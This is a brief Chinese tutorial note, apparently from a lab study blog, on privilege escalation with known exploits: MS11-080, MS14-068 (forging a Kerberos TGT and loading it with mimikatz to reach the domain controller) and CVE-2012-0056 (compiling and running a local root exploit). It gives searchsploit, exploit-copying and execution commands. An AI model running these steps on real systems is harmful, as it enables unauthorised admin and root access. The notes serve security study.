提权-利用漏洞提权

提权-利用漏洞提权

Ms11-080

1
2
searchsploit ms11-080
cp /usr/share/exploitdb/exploits/windows/local/18176.py .
  • 如果目标机器有python环境,直接执行就可以。

Ms14-068

  • 从本机管理员权限获取域管理员权限

    1. searchsploit ms14-068得到35474.py
    2. cp /usr/share/exploitdb/exploits/windows/remote/35474.py ~/ms14-068.py
    3. 在windows通过kali /usr/share/windows-resources/binaries/whoami.exe得到域用户的sid,还需要域控制器的ip。
    4. 使用漏洞利用代码生成TGT票据(kerbros协议的票据)
      • python ms14-068.py -u u1@lab.com -s S-1-5-21-1226907004-2355705551-2341087478-1109 -d 192.168.0.119
      • 输入u1域用户的密码
      1. 拷贝票据到windows系统
    5. 通过minikatz完成提权
      • kerberos::ptc TGT_u1@lab.com.ccache
    6. 发现可以访问域控制器的C盘

CVE-2012-0056

  • CVE-2012-0056

  • Ubuntu11.10

  • gcc

    • sudo apt-cdrom add把光盘作为apt的更新源
    • sudo apt-get install gcc
    • gcc 18411.c -o exp
  • 首先searchesploit 18411.c 找到文件位置 /usr/share/exploitdb/exploits/linux/local

  • scp /usr/share/exploitdb/exploits/linux/local/18411.c flower@192.168.0.110:/home/flower

  • gcc编译好后,直接执行./exp,发现命令提示符$变为#,提权成功。

其它:

Ms08-067

Ms09-001

Ms10-017

Ms12-020

Kali修改默认python为python3

  • rm /usr/bin/python

  • ln -s /usr/bin/python3 /usr/bin/python